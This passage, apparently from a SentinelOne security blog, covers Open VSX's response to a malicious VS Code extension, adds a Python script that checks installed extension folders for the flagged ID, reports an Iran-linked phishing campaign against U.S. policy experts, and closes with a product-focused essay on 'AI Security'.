In response, Open VSX has introduced new security measures, including shorter token lifetimes, automated scans, revoking any leaked credentials, and working in coordination with VS Code to block emerging threats. Best practices for developers include verifying extension publishers and installing software only from trusted repositories to avoid supply-chain compromises.
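To check developer workstations for the extension named above, the installed-extension folders can be audited by ID. This is an added example, not tooling from Open VSX or the researchers; the per-user folder locations for VS Code and its forks are assumptions, and the helper names are hypothetical.

```python
import json
import re
from pathlib import Path

FLAGGED_IDS = {"juan-bianco.solidity-vlang"}  # extension ID named in the report

# Assumption: default per-user extension folders for VS Code and common forks.
DEFAULT_DIRS = (".vscode", ".vscode-oss", ".cursor", ".windsurf")

# Installed extensions normally live in folders named <publisher>.<name>-<version>.
_FOLDER_RE = re.compile(r"^(?P<id>.+?)-(?P<version>\d+\.\d+\.\d+.*)$")


def identify(ext_dir):
    """Return (extension_id, version) from package.json, else from the folder name."""
    try:
        meta = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    except (OSError, ValueError):
        meta = {}  # missing, unreadable or malformed manifest
    if not isinstance(meta, dict):
        meta = {}
    publisher, name = meta.get("publisher"), meta.get("name")
    if isinstance(publisher, str) and isinstance(name, str):
        return f"{publisher}.{name}".lower(), str(meta.get("version", "unknown"))
    match = _FOLDER_RE.match(ext_dir.name)
    if match:
        return match.group("id").lower(), match.group("version")
    return ext_dir.name.lower(), "unknown"


def find_flagged(roots=None, flagged=FLAGGED_IDS):
    """List installed extensions whose ID is in the flagged set."""
    if roots is None:
        roots = [Path.home() / d / "extensions" for d in DEFAULT_DIRS]
    hits = []
    for root in map(Path, roots):
        if not root.is_dir():
            continue
        for ext_dir in sorted(p for p in root.iterdir() if p.is_dir()):
            ext_id, version = identify(ext_dir)
            if ext_id in flagged:
                hits.append({"id": ext_id, "version": version, "path": str(ext_dir)})
    return hits


if __name__ == "__main__":
    results = find_flagged()
    for hit in results:
        print(f"FLAGGED {hit['id']} {hit['version']} at {hit['path']}")
    if not results:
        print("No flagged extensions found in the default folders.")
```

The manifest is preferred over the folder name because a folder can be renamed, while the folder-name fallback still catches installs whose package.json is missing or malformed.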

The Ugly | Iran-Based Actors Target U.S. Policy Experts in New Espionage Campaign

Between June and August, a newly identified threat cluster dubbed ‘UNK_SmudgedSerpent’ launched a series of targeted cyberattacks against U.S.-based academics and foreign policy experts focused on the Middle East. The campaign, coinciding with rising Iran-Israel tensions, uses politically-themed lures related to Iranian domestic affairs and the militarization of the Islamic Revolutionary Guard Corps (IRGC).

Researchers say the threat actors behind the campaign initiated attacks with benign email exchanges before introducing phishing links impersonating prominent U.S. foreign policy figures and think tank institutions like the Brookings Institution and Washington Institute.

The targeted victims, over 20 U.S.-based experts on Iran-related policy, were enticed to open malicious meeting documents and login pages designed to harvest their Microsoft account credentials. In some attacks, the attackers sent URLs leading to fake MS Teams login pages but pivoted to spoofed OnlyOffice sites if the victim grew suspicious.

Example of UNK_SmudgedSerpent phishing email (Source: Proofpoint)

Clicking the links led to the download of malicious MSI installers disguised as Microsoft Teams, which then deployed legitimate remote monitoring and management (RMM) software like PDQ Connect. Subsequent activity suggests attackers manually installed additional tools such as ISL Online, indicating possible hands-on-keyboard intrusion.

Researchers note that the operation’s tactics mirror those of known Iranian cyberespionage groups such as TA455 (aka UNC1549, Smoke Sandstorm), TA453 (aka TunnelVision, APT 35, UNC788), and TA450 (aka TEMP.Zagros).

The researchers believe UNK_SmudgedSerpent’s campaigns are part of a broader collection effort by Iranian intelligence aimed at gathering insights from Western experts on regional policy, academic analyses, and strategic technologies.

AI Security: Defining and Defending Cybersecurity’s Next Frontier

Every major technology revolution begins the same way: Promise, panic, and potential.

The internet gave us connection. Cloud gave us scale. AI is giving us cognition – systems that can reason, decide, and act.

Firewalls helped the internet era. Workload protection helped the cloud era. And, in the AI era, you have AI Security.

This is a new field and frontier that requires mastering two disciplines at once.

  • Security for AI – Governing and protecting the usage of AI itself. Models, data, agents, and the users and developers who rely on them. In many cases, this is also done by AI.
  • AI for Security – Applying agentic AI and machine learning to solve today’s biggest cybersecurity challenge: Staying ahead of AI-powered attacks by detecting, investigating, and responding at machine speed.

Most importantly, in this era, the architecture and infrastructure needed to truly benefit from AI will be the determining factor to successfully secure it. Quality of data, inclusivity of data, cardinality, and latency will be critical, as will be the tools and technologies facilitating those.

At OneCon 2025, we are laying out a practical path to secure this new world. The opportunities AI creates, the risks it introduces. The strategy and product innovation you can put to work today to accelerate and de-risk your AI journey.

AI: Business Accelerant & New Attack Surface

The need for these dual disciplines is driven by the rapid increase in AI usage itself – both by good and bad forces.

AI is accelerating everything. It is transforming how businesses operate, how employees work, and how attackers adapt. Across every single industry, AI is becoming embedded into processes, tools and workflows in every team. Marketing teams use it to generate content. Developers use it to write code. Legal, HR and finance all use it to summarize and automate tasks. AI is now woven into the very fabric of how organizations think and operate.

While holding incredible potential benefits, this transformation is also introducing massive new security risks. Traditional security controls are blind to the data that employees are entering into 3rd-party AI models. Security teams lack visibility into the growing ecosystem of AI tools and assistants spreading across every single enterprise. AI-based browsers that integrate chat or summarization features create new pathways for data exposure. And the rise of Model Context Protocol (MCP) servers that connect agents to agents introduces an entirely new layer of risk that most organizations are not equipped to monitor or govern today.

Meanwhile, adversaries are evolving just as quickly. They are using AI to increase efficiency, precision, and their reach. Non-native English speakers can now craft a convincing, localized spearphishing campaign in minutes. LLMs are being used to write polymorphic malware that mutates faster than traditional defenses can react. Attackers are automating their reconnaissance, identifying vulnerabilities through natural language interfaces, and even embedding AI models directly inside malware to adapt in real time.

The result is a security gap that spans both sides of the equation – on one side, AI as a catalyst for real business innovation and, on the other, AI as an enabler of attack and massive risk exposure.

Building Security in the Age of AI: Three Critical Principles

Protecting this new world requires visibility, intelligent automation, and governance that can move at the same speed as AI itself. In solving for that, we believe in a simple yet critical guiding philosophy to delivering effective AI Security – three critical principles that inform everything that we build and anchor any platform-level defense.

  1. Intelligence Over Rules – Security must think, not react. Static signatures and brittle logic can’t match the velocity of modern threats. True protection emerges when AI continuously learns, reasons, and adapts — detecting intent, not just pattern.
  2. Autonomy with Accountability – Machines should act at machine speed, but always within human-defined guardrails and system supervision. The future of defense is autonomous, but never ungoverned: AI decisions remain explainable, traceable, and aligned with human values.
  3. Unity of Data, Context, and Action – Effective AI security fuses signals from endpoints, identities, and clouds into one coherent understanding. Insight without context is noise; action without context is chaos. The synthesis of both creates real-time, end-to-end resilience.

These principles map directly to the questions customers ask us every day.

How do I better defend my organization?

How do I outpace threats?

How do I get the most from my people and partners?

SentinelOne’s AI Advantage

When it comes to making AI Security real today, SentinelOne is in a unique position. We have been AI-native since day one. Automation has been foundational from the start, not a bolt-on. And, we’ve been using agentic approaches and workflows in live security environments before it became the buzzword du jour.

At launch, we were among the first to apply machine learning to malware detection and prevention. That broke the decades-old pattern of pushing static signatures to endpoints many times a day. Instead of distributing new rules after every outbreak, we trained lightweight predictive models that identified malicious behavior on their own. That meant detecting never-before-seen threats in real time at massive scale.

That innovation reshaped endpoint security and set the foundation for what followed. The same principles of data-driven models, autonomous decision making, and behavioral analytics evolved into the Singularity™ Platform and now power Purple AI, our agentic system that changes how analysts detect, investigate, and respond. Together, they extend protection and intelligence across endpoint, identity, cloud, and AI. It is an entire platform built on and enhanced by AI. This is how we keep our customers safe: By delivering real time security that is predictive and adaptive, at planet scale.

This year we took the next step with two focused acquisitions:

  • Prompt Security – A portfolio built to secure AI use cases and protect how employees, developers, and applications leverage generative and agentic AI. This is a critical component of protecting AI as an attack surface itself.
  • Observo AI – An AI-ready streaming data pipeline that intelligently filters, normalizes, and ingests petabytes of telemetry across the enterprise with sub-second latency and strong cost efficiency. Combined with Singularity AI SIEM, this provides both pre-ingestion analytics and flexible pull/stream data collection, ensuring complete visibility, real-time detections and autonomous response across the entire security environment.

These advancements extend Singularity into a unified AI Security architecture that gives defenders a complete, autonomous view across traditional and emerging surfaces – from premise to cloud.

Delivering on the AI Security Vision Today

Today at OneCon, we’re not just giving customers a roadmap and strategy, we’re giving them new tools and innovation to start securing their AI-enterprise today, including:

  • New solutions from Prompt Security to secure AI apps, tools, developers and agents – Real-time visibility and policy enforcement across thousands of AI tools. Shadow AI discovery, data loss prevention for prompts and outputs, safe coding with secret redaction and vulnerable code blocking, and protection for internal AI applications.
  • Purple AI innovations – Integrated agentic auto-investigations with dynamic runbooks. Next best actions on alerts. One-click custom detection rule creation that turns investigation outcomes into durable detections. Integration with Singularity Hyperautomation for approved response.
  • Purple AI MCP Server – A secure bridge between Singularity’s live intelligence and your AI ecosystem. Build your own agents grounded in your security context. Use OpenAI, Anthropic, Gemini, or internal models. Innovate securely at scale. The MCP Server is open source and available on GitHub today.
  • Observo AI pipelines and integration with Singularity AI-SIEM – Vendor-agnostic data engine for any source to any destination. When paired with Singularity AI SIEM, Observo supercharges detection and response with high-fidelity, cost-efficient streaming telemetry.
  • Wayfinder Threat Detection and Response with Google Threat Intelligence – Global insight combined with automation and human expertise. GTI visibility feeds directly into SentinelOne services. Intelligence becomes action through Purple and our analysts. Faster, more precise response as a matter of process, not hope.
  • Platform upgrades:
    • Native scalability to million+ active agents in a single deployment. Faster policy updates with minute command SLA.
    • Agent efficiency improvements across operating systems. Lower CPU and memory usage, fewer support cases, better user experience.
    • AI SIEM query engine overhaul that supports very high cardinality and keeps up to seven years of security data hot. Natural language search in Purple AI operates on the same high performance data. No cold storage delays.
    • Live Security Updates upgrades that dramatically reduce response times, and improve accuracy and efficacy. And more customer controls for safe rollout.
    • Thousands of new detections continually delivered, from the AI-SIEM to the endpoint agent. We’re wherever the adversary moves, delivering real-time protection across dozens of surfaces and data sources. With AI infused into every layer of our operations, we’re moving faster, scaling further, and stopping even unknown threats with greater precision than ever before.
    • New Infrastructure as Code (IaC) deployment processes, better observability across the platform, and proactive communications on incidents via a public status page have all been added to bolster resilience, reliability and transparency.
    • Active monitoring mode and proactive alerting extend resilience outside the SaaS operation into the Endpoint agent, providing near real-time health metrics of the agents themselves – now transparently available for customer visibility in the agent management control plane.

The Path Forward in AI Security: Advancing Humanity, Protecting the Human

AI security is more than just defending systems; it’s about defending the fabric of trust that lets humans thrive in a digital world. As intelligence becomes ambient and autonomous, security must evolve from a reactive layer into an enabling force for human progress.

  • Empowering Human Potential – By offloading complexity and noise to intelligent machines, AI security frees humans to focus on creativity, empathy, and purpose. Protection becomes invisible, a silent force amplifying human capability rather than constraining it.
  • Preserving Digital Integrity – As data becomes identity, securing truth is a moral imperative. AI security safeguards the authenticity of information, ensuring societies can rely on what they see, share, and believe. As our lives move fully into digital spaces, the boundary between human and machine expression blurs. Every action carries traces of who we are. In this new reality, AI Security’s role is to safeguard that trust: To ensure that what we see, share, and decide upon is authentic. It means protecting the fidelity of data, the truth of identities, and the integrity of digital interactions against manipulation. It is the contract to our reality.
  • Building Ethical Autonomy – The next era demands systems that defend not only themselves, but the people they serve. Ethical AI security means designing intelligence that understands context, respects privacy, and acts in humanity’s best interest even when no one is watching.

Ultimately, the path forward fuses human and artificial intelligence into a shared defense, machines protecting people, and people guiding machines, so that technology remains our most trusted ally, not our greatest risk.

Defenders deserve a technology that protects every surface, that can see everything, turns data into advantage, and puts human governance at the center. So, let’s get started.

AI for Security. Security for AI. Autonomous protection, always evolving, in production, today, all in pursuit of a safer, brighter future.
